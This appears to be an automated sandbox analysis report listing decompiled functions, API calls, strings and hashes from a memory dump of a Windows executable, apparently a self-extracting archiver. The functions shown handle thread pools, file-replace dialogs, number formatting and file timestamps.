Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

_wcschr.LIBVCRUNTIME ref: 0083B299
_wcschr.LIBVCRUNTIME ref: 0083B2A9

Strings

%c:\, xrefs: 0083B271

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: e8b5eed57a33a3a5c029da6407cde61b8453bfe1851e0ed336fc7cdda3546734
Instruction ID: df34fe925fc72c0bc9ad4882215e08b1d23e8ec795eea35f094e6b9b15306323
Opcode Fuzzy Hash: e8b5eed57a33a3a5c029da6407cde61b8453bfe1851e0ed336fc7cdda3546734
Instruction Fuzzy Hash: 0201F5A35003116A9A20AB698C86D6FA7ACFEC53B0F90851AFE54C6081FF60D854C2E2

Uniqueness

Uniqueness Score: -1.00%

Function 0084033D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0084033D(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x20;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x21] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0x68]); // 0x1a0
				_t25[0x65] = 0;
				InitializeCriticalSection(_t3);
				_t25[0x66] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0x67] = _t14;
				if(_t25[0x66] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x8700e0);
					E00836DE3(E00836DE8(_t19), 0x8700e0, _t25, 2);
				}
				_t25[0x63] = 0;
				_t25[0x64] = 0;
				_t25[0x22] = 0;
				return _t25;
			}

0x0084033d
0x0084033d
0x00840345
0x00840349
0x0084034a
0x0084034e
0x00840350
0x00840350
0x00840359
0x0084035b
0x0084035b
0x0084035d
0x00840365
0x00840367
0x00840367
0x00840369
0x0084036f
0x00840376
0x0084038a
0x00840390
0x00840396
0x008403a2
0x008403a8
0x008403b2
0x008403be
0x008403be
0x008403c4
0x008403cc
0x008403d2
0x008403db

APIs

InitializeCriticalSection.KERNEL32(000001A0,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000,?,00000001,?), ref: 00840376
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000), ref: 00840380
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000), ref: 00840390

Strings

Thread pool initialization failed., xrefs: 008403A8

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 065dd4b3758e60ce2432c9ab479f6c586f45de99170bac097d9a16365f2710d9
Instruction ID: a634be4c6aa188f0d32a91c37af08ebbd28543419588ab596b011cb6c818c177
Opcode Fuzzy Hash: 065dd4b3758e60ce2432c9ab479f6c586f45de99170bac097d9a16365f2710d9
Instruction Fuzzy Hash: DC1130B1600B08AFD3305F699C85AABFBECFB55355F11482EE2DEC2250DA716880CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0084C9C4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084C9C4(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0x88ce10 = _a12;
				 *0x88ce14 = _a16;
				 *0x8775f4 = _a20;
				if( *0x8775f0 == 0) {
					if( *0x8775cf == 0) {
						_t16 = E0084B014;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x870064, _t25,  *0x8775e8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x870060, L"RENAMEDLG",  *0x8775c8, E0084C2FD, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x0084c9cf
0x0084c9d8
0x0084c9e1
0x0084c9e6
0x0084c9f3
0x0084ca04
0x0084ca09
0x0084ca30
0x0084ca44
0x0084ca49
0x00000000
0x00000000
0x0084ca2e
0x00000000
0x00000000
0x0084ca2e
0x00000000
0x0084ca50
0x00000000
0x0084c9f7
0x00000000

Strings

RENAMEDLG, xrefs: 0084CA1F
REPLACEFILEDLG, xrefs: 0084CA09, 0084CA3B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 88aac3019fc7c4ff2a7a3cee028d7ad0bc8cf3a6bb88b756e2ee520c91a8148d
Instruction ID: 42b32e69a12d23d2d6ae86c083b476a4cde59e4518a1272f7542ae51ba8bfff1
Opcode Fuzzy Hash: 88aac3019fc7c4ff2a7a3cee028d7ad0bc8cf3a6bb88b756e2ee520c91a8148d
Instruction Fuzzy Hash: 82015EB260922DABC741DB58EC48E16BBDDF745394F010426F555E2234D272D854DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008312D7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E008312D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0083D72D(0x870078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0083D754(0x870078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x86dfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x8622e4);
								}
							}
						}
					}
				}
				return 0;
			}

0x008312de
0x00831341
0x008312e0
0x008312e0
0x008312e7
0x008312fd
0x00831306
0x0083130b
0x00831313
0x0083131b
0x00831323
0x00831331
0x00831331
0x00831323
0x00831313
0x00831306
0x008312e7
0x00831349

APIs

Part of subcall function 0083D754: _swprintf.LIBCMT ref: 0083D77A
Part of subcall function 0083D754: _strlen.LIBCMT ref: 0083D79B
Part of subcall function 0083D754: SetDlgItemTextW.USER32(?,0086D154,?), ref: 0083D7FB
Part of subcall function 0083D754: GetWindowRect.USER32(?,?), ref: 0083D835
Part of subcall function 0083D754: GetClientRect.USER32(?,?), ref: 0083D841

GetDlgItem.USER32(00000000,00003021), ref: 0083131B
SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

Strings

0, xrefs: 008312DA
0Z, xrefs: 008312EC, 0083133C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0$0Z
API String ID: 2622349952-1378374853
Opcode ID: fecae7eacc383649d3979680c4740dc0e9c396aa8063fdf6de1c006152a9083b
Instruction ID: 295b3accd763a0b3e1740067a095fd88d31943579b9c102fbbc4a77971f53d65
Opcode Fuzzy Hash: fecae7eacc383649d3979680c4740dc0e9c396aa8063fdf6de1c006152a9083b
Instruction Fuzzy Hash: 4AF0AF70580348ABDF250F609C8DAE93B99FB94784F049014FD89D16A1CFBCC894EB90

Uniqueness

Uniqueness Score: -1.00%

Function 008587A4, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E008587A4(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E008533B6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0084DB40( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0084DB40( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x854021
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0084E920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0084DB40( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0084DE40();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0084DE40();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0084DE40();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00858AA7(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00861020(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00857F42();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00857E21();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x008587a4
0x008587af
0x008587b6
0x008587b8
0x008587b8
0x008587ba
0x008587c3
0x008587c5
0x008587ca
0x008587d0
0x008587e6
0x008587eb
0x008587ee
0x008587fb
0x00858800
0x00858854
0x0085885c
0x0085885e
0x00858860
0x00858863
0x00858863
0x00858863
0x00858869
0x00858871
0x00858884
0x00858887
0x00858889
0x0085888c
0x0085888d
0x008588ae
0x008588b1
0x008588b1
0x0085888f
0x0085888f
0x00858891
0x0085889c
0x0085889c
0x0085889e
0x008588a5
0x008588a0
0x008588a0
0x008588a0
0x0085889e
0x008588b2
0x008588b4
0x008588b5
0x008588b8
0x008588ba
0x008588ce
0x008588bc
0x008588bc
0x008588bc
0x008588d3
0x008588d3
0x008588d8
0x008588db
0x008588e6
0x008588e6
0x008588e6
0x008588e6
0x008588ea
0x008588f1
0x008588f2
0x008588f5
0x008588f8
0x008588f8
0x008588fa
0x00000000
0x00000000
0x00858912
0x00858919
0x0085891d
0x00858920
0x00858923
0x00858925
0x00858925
0x00858925
0x00858927
0x0085892a
0x0085892d
0x0085892f
0x00858937
0x0085893d
0x00858940
0x00858943
0x00858944
0x00858947
0x0085894a
0x0085894a
0x0085894f
0x00858952
0x00000000
0x00000000
0x0085896a
0x0085896f
0x00858973
0x00000000
0x00000000
0x00858977
0x00858977
0x0085897a
0x0085897b
0x0085897b
0x0085897d
0x00858980
0x00000000
0x00000000
0x00858982
0x00858985
0x0085898c
0x0085898f
0x00858992
0x008589a8
0x008589a8
0x008589a8
0x00858994
0x00858994
0x00858996
0x00858999
0x008589a4
0x0085899b
0x0085899e
0x0085899e
0x00858999
0x00000000
0x00858992
0x00858987
0x00858987
0x00858989
0x00858989
0x008588dd
0x008588dd
0x008588e0
0x008589ab
0x008589ab
0x008589ad
0x008589af
0x008589b2
0x008589b3
0x008589b4
0x008589b5
0x008589bd
0x008589bd
0x008589bd
0x008589bf
0x008589c2
0x008589c5
0x008589c7
0x008589c7
0x008589c9
0x008589db
0x008589df
0x008589e2
0x008589e9
0x008589f1
0x008589f1
0x008589f4
0x008589f6
0x00858a07
0x00858a07
0x00858a0b
0x00858a0b
0x00858a0e
0x00858a10
0x00858a13
0x00000000
0x008589f8
0x008589f8
0x008589fe
0x008589fe
0x00858a02
0x00858a15
0x00858a15
0x00858a19
0x00858a1a
0x00858a1c
0x00858a1e
0x00858a5f
0x00858a5f
0x00858a61
0x00858a6e
0x00858a6e
0x00858a70
0x00858a72
0x00858a73
0x00858a74
0x00858a7b
0x00858a7e
0x00858a80
0x00858a80
0x00858a81
0x00858a83
0x00858a86
0x00858a86
0x00858a88
0x00858a8a
0x00000000
0x00858a8a
0x00858a63
0x00858a65
0x00000000
0x00000000
0x00858a67
0x00000000
0x00000000
0x00858a69
0x00858a6c
0x00000000
0x00000000
0x00000000
0x00858a6c
0x00858a25
0x00858a2b
0x00858a2b
0x00858a2d
0x00858a2e
0x00858a2f
0x00858a30
0x00858a37
0x00858a3a
0x00858a3c
0x00858a3d
0x00858a3f
0x00858a4c
0x00858a4c
0x00858a4e
0x00858a50
0x00858a51
0x00858a52
0x00858a59
0x00858a5c
0x00858a5e
0x00858a5e
0x00000000
0x00858a5e
0x00858a41
0x00858a41
0x00858a43
0x00000000
0x00000000
0x00858a45
0x00000000
0x00000000
0x00858a47
0x00858a4a
0x00000000
0x00000000
0x00000000
0x00858a4a
0x00858a27
0x00858a29
0x00000000
0x00000000
0x00000000
0x00858a29
0x008589fa
0x008589fc
0x00000000
0x00000000
0x00000000
0x008589fc
0x008589f6
0x00000000
0x008588e0
0x008588db
0x00858802
0x00858804
0x00000000
0x00858806
0x0085881c
0x00858821
0x00858823
0x0085882f
0x00858835
0x00858836
0x00858838
0x0085883a
0x00858845
0x00858845
0x00858848
0x0085884a
0x0085884a
0x0085884d
0x00858825
0x00858825
0x00858825
0x00000000
0x00858823
0x008587d2
0x008587d2
0x008587d9
0x008587da
0x008587dc
0x00858a8e
0x00858a92
0x00858a97
0x00858a97
0x00858aa6
0x00858aa6

APIs

_strrchr.LIBCMT ref: 0085882F
__alldvrm.LIBCMT ref: 00858A30
__alldvrm.LIBCMT ref: 00858A52

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
Instruction ID: 964ca2d81dccd9a210f9513fe0bec48be314608014a9ff0d8b33a6b65d5f1de3
Opcode Fuzzy Hash: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
Instruction Fuzzy Hash: FEA11571A04396DFEB12CF18C8917BEBFA5FF55311F18416BD885EB282CA348949C752

Uniqueness

Uniqueness Score: -1.00%

Function 0083A03A, Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0083A03A(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0084D9C0();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00839F23( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0083A1D3( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00840857(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00840857(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00840857(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0083A1D3( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0083B3C9( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x0083a03a
0x0083a03f
0x0083a04b
0x0083a052
0x0083a056
0x0083a063
0x0083a063
0x0083a067
0x0083a067
0x0083a070
0x0083a07d
0x0083a07d
0x0083a081
0x0083a081
0x0083a08a
0x0083a098
0x0083a098
0x0083a09c
0x0083a0a3
0x0083a0a8
0x0083a0af
0x0083a0c5
0x0083a0b5
0x0083a0be
0x0083a0be
0x0083a0e0
0x0083a0e6
0x0083a0ed
0x0083a137
0x0083a13c
0x0083a145
0x0083a145
0x0083a14f
0x0083a158
0x0083a158
0x0083a162
0x0083a16b
0x0083a16b
0x0083a17b
0x0083a17f
0x0083a18f
0x0083a19f
0x0083a1a5
0x0083a1ac
0x0083a1b4
0x0083a1c1
0x0083a1c1
0x00000000
0x0083a0ef
0x0083a100
0x0083a107
0x0083a1c6
0x0083a1d0
0x0083a1d0
0x0083a124
0x0083a12a
0x0083a131
0x00000000
0x00000000
0x00000000
0x0083a131
0x0083a0ed
0x0083a092
0x0083a096
0x00000000
0x00000000
0x00000000
0x0083a096
0x0083a077
0x0083a07b
0x00000000
0x00000000
0x00000000
0x0083a07b
0x0083a05d
0x0083a061
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00837FC2,?,?,?), ref: 0083A0E0
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00837FC2,?,?), ref: 0083A124
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00837FC2,?,?,?,?,?,?,?,?), ref: 0083A1A5
CloseHandle.KERNEL32(?,?,00000000,?,00837FC2,?,?,?,?,?,?,?,?,?,?,?), ref: 0083A1AC

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 14df57cf07f9d6cbb75c556f009d067ca00553eded576ca30bbaea9540455c89
Instruction ID: b92abf2c6d2ea4b9aca80a09d799cdaac185f0fcc7cf78308ab49393fd8a93b6
Opcode Fuzzy Hash: 14df57cf07f9d6cbb75c556f009d067ca00553eded576ca30bbaea9540455c89
Instruction Fuzzy Hash: 4041AA31248781AAE729DF28DC55BAFBBE8FB81700F04091DB5E1D7190C6A49A48DB93

Uniqueness

Uniqueness Score: -1.00%

Function 0085B645, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

